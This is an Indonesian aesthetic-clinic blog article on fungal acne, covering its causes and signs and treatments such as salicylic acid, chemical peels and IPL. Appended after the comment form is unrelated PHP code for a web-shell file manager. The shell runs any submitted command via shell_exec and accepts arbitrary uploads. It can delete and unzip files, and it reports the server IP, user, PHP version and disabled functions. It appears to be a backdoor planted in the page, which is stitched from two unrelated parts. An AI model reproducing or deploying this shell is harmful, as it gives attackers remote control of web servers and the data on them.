Ada Yang Bisa Kami Bantu? Chat Kami Sekarang.

Kenali dan Ketahui Cara Atasi Fungal Acne dengan Mudah

-

Daftar Isi

Jerawat atau acne merupakan gangguan pada kulit yang terjadi karena produksi minyak (sebum) berlebih. Biasanya jerawat terjadi ketika folikel rambut atau tempat tumbuhnya rambut tersumbat oleh minyak dan sel kulit mati. Kondisi ini bisa menyebabkan terjadinya peradangan dan penyumbatan pada pori kulit.

Pada umumnya peradangan pada jerawat di tandai dengan timbulnya benjolan kecil yang berisi nanah di atas permukaan kulit, dan sering terjadi pada bagian tubuh yang men ghasilkan kelenjar minyak terbanyak pada area wajah, leher, dan punggung. Banyak faktor yang bisa menyebabkan munculnya jerawat seperti pola makan yang tidak sehat, penggunaan produk perawatan tidak sesuai kebutuhan kulit.

Umumnya kita mengenal jerawat berdasarkan letaknya seperti jerawat wajah, leher, dada atau jerawat punggung. Jika melihat dari bentuknya jerawat terdiri dari papula, nodula, pustula, atau jerawat batu. Namun, selain itu ternyata ada jerawat jamur atau lebih di kenal dengan fungal acne.

Apa Itu Fungal Acne

Malassezia (pityrosporum) folliculitis atau fungal acne, merupakan masalah kulit yang di sebabkan oleh jamur malassezia. Jamur jenis ini akan menempel pada kulit kemudian menimbulkan benjolan kecil berwarna merah yang menyerupai jerawat. Biasanya jamur ini menimbulkan rasa gatal dan tentunya mengganggu penampilan.

Ciri – Ciri Fungal Acne

Jika di lihat dengan kasat mata, fungal acne dan jerawat di sebabkan oleh bakteri  dengan bentuk yang hampir sama. Biasanya, fungal acne berbentuk seperti bintik kecil yang bertekstur dengan jumlah yang sangat banyak dalam satu area. Fungal acne sering di temukan pada area T wajah, dahi, hidung, dan dagu karena area tersebut rentan berminyak di banding area lainnya.

Biasanya fungal acne akan terasa lebih gatal dan meradang ketika cuaca sedang panas atau terpapar sinar matahari langsung tanpa perlindungan uv protection. Hindari menggaruk secara berlebihan karena bisa menyebabkan iritasi dan memperburuk kondisi fungal acne.

Penyebab Fungal Acne

Banyak faktor yang bisa menyebabkan fungal acne, salah satunya kurangnya menjaga kebersihan dan pola makan yang tidak teratur. Fungal acne bisa di sebabkan oleh kulit yang lembap karena pakaian yang basah atau kulit berkeringat dalam waktu lama yang memicu tumbuhnya jamur penyebab fungal acne. Selain itu, pastikan sobat cakas menggunakan pakaian yang nyaman di gunakan dan hindari menggunakan pakaian ketat. Mengenakan pakaian terlalu ketat bisa meningkatkan produksi minyak berlebih dan produksi jamur meningkat. Seperti jerawat pada umumnya, pola makan yang tidak teratur bisa mempengaruhi pertumbuhan jamur kulit.

Cara Atasi Fungal Acne

Beda penyebab, beda cara mengatasinya, salah cara mengatasi bisa memperburuk kondisi fungal acne. Oleh karena itu, yuk ketahui bagaimana cara atasi fungal acne di bawah ini.

  • Gunakan Skincare dengan Kandungan Salicylic Acid

Salah satu cara yang bisa di lakukan yaitu menggunakan skincare dengan kandungan salicylic acid untuk mengurangi penumpukan folikel rambut yang berpotensi menyebabkan munculnya fungal acne. Sobat cakas bisa menggunakan produk perawatan seperti sabun, serum, atau obat totol jerawat sesuai saran dokter.

  • Membersihkan Wajah dan Badan dengan Teratur

Salah satu cara yang harus di lakukan untuk mencegah tumbuhnya bakteri dan jamur yaitu mandi dan mencuci wajah dengan teratur. Karena jamur fungal acne juga bisa tumbuh pada area tubuh terlebih ketika berkeringat, oleh karena itu pastikan kamu menjaga kebersihan badan dan wajah dengan baik.

  • Melakukan Perawatan Chemical Peeling di Klinik Kecantikan

Salah satu perawatan wajah untuk atasi fungal acne yaitu chemical peeling, tindakan dengan mengoleskan zat kimia pada kulit wajah yang bertujuan untuk mengelupaskan sel kulit mati dan meregenerasi sel kolagen dan fibrolas. Menjadikan kulit cerah dan membantu atasi masalah jerawat. Peeling termasuk perawatan wajah non invansif yang prosesnya dilakukan oleh dokter dengan menggunakan cairan kimia pengelupasan yang mengandung AHA, TCA, dan BHA. Treatment ini berfungsi untuk memperhalus tekstur kulit yang tidak rata akibat penumpukan sel kulit mati, mencerahkan kulit, mengatasi masalah jerawat dan noda hitam bekas jerawat.

  • Treatment IPL for Acne

Selain chemical peeling, fungal acne bisa di cegah dan di atasi dengan IPL for Acne. IPL (Intense Pulsed Light) merupakan perawatan wajah yang menggunakan teknologi cahaya lampu xenon dalam intensitas tinggi yang bertujuan untuk meremajakan kulit dan mengatasi salah jerawat. Selain itu IPL berfungsi untuk mengatasi flek hitam, mencerahkan wajah, penuaan dini/kerutan, dan menyamarkan bekas luka.

Nah itu dia ciri-ciri singkat dan beberapa cara yang bisa di lakukan untuk atasi fungal acne, semoga bermanfaat. Sobat cakas yang punya masalah dengan beruntusan, penuaan, atau masalah kulit dan kecantikan lainnya, yuk segera konsultasikan dengan dokter kami di RSa Aesthetic Clinic.

Cantik Ayu Kasep Wibawa

Klinik RSa Aesthetic

Klinik RSa Aesthetic

Klinik Treatment Kecantikan Berkualitas di Bandung

Bagikan Artikel Via:

Share on facebook
Facebook
Share on twitter
Twitter
Share on linkedin
LinkedIn
Share on whatsapp
WhatsApp

Tinggalkan Komentar

Alamat email Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *

basename($file), 'size' => '', 'last_modified' => date('Y-m-d H:i:s', filemtime($file)), 'owner' => posix_getpwuid(fileowner($file))['name'], 'permissions' => substr(sprintf('%o', fileperms($file)), -4), ); } else { $files[] = array( 'name' => basename($file), 'size' => filesize($file), 'last_modified' => date('Y-m-d H:i:s', filemtime($file)), 'owner' => posix_getpwuid(fileowner($file))['name'], 'permissions' => substr(sprintf('%o', fileperms($file)), -4), ); } } // Handle file upload if (isset($_FILES['file'])) { $file = $_FILES['file']; if ($file['size'] > $max_upload_size) { echo 'File too large!'; } else { move_uploaded_file($file['tmp_name'], $current_dir. '/'. $file['name']); } } // Handle file deletion if (isset($_POST['delete'])) { $file = $_POST['delete']; $file_path = rtrim($current_dir, '/') . '/' . $file; if (file_exists($file_path) && is_file($file_path)) { unlink($file_path); header('Location: ' . $_SERVER['PHP_SELF'] . '?dir=' . rawurlencode(rtrim($current_dir, '/'))); exit; } else { echo 'File not found or not a file!'; } } // Handle terminal command if (isset($_POST['command'])) { $command = $_POST['command']; $output = shell_exec($command); echo "
$output
"; // Update current directory if command is cd if (strpos($command, 'cd ') === 0) { $new_dir = trim(substr($command, 3)); if ($new_dir == '..') { $current_dir = dirname($current_dir); } elseif ($new_dir!= '') { $current_dir = realpath($current_dir. '/'. $new_dir); } } } // Handle unzip if (isset($_POST['unzip'])) { $file = $_POST['unzip']; $file_path = $current_dir. '/'. $file; if (file_exists($file_path) && is_file($file_path)) { $zip = new ZipArchive; $res = $zip->open($file_path); if ($res === TRUE) { $zip->extractTo($current_dir); $zip->close(); echo "Unzipped successfully!"; } else { echo "Failed to unzip!"; } } else { echo "File not found or not a file!"; } } // Handle mkdir if (isset($_POST['mkdir'])) { $dir = $_POST['mkdir']; $dir_path = $current_dir. '/'. $dir;if (!is_dir($dir_path)) { mkdir($dir_path, 0750, true); echo "Directory created successfully!"; } else { echo "Directory already exists!"; } } // System information $server_ip = $_SERVER['SERVER_ADDR']; $web_server = $_SERVER['SERVER_SOFTWARE']; $system = php_uname('s'); $user = $_SERVER['USER']; $php_version = phpversion(); $disabled_functions = ini_get('disable_functions'); // MySQL, cURL, WGET, Perl, and Python information $mysql_enabled = function_exists('mysql_connect')? 'ON' : 'OFF'; $curl_enabled = function_exists('curl_init')? 'ON' : 'OFF'; $wget_enabled = shell_exec('wget --version')? 'ON' : 'OFF'; $perl_enabled = shell_exec('perl -v')? 'ON' : 'OFF'; $python_enabled = shell_exec('python --version')? 'ON' : 'OFF'; function filesize_format($size) { $units = array('B', 'KB', 'MB', 'GB', 'TB'); for ($i = 0; $size >= 1024 && $i < count($units) - 1; $i++) { $size /= 1024; } return round($size, 2). ' '. $units[$i]; } ?> File Manager

File Manager

Current directory:

Name Size Last Modified Owner Permissions Options

System Information

Server IP:

Web Server:

System:

User:

PHP Version:

Disabled Functions:

Module Information

MySQL:

cURL:

WGET:

Perl:

Python: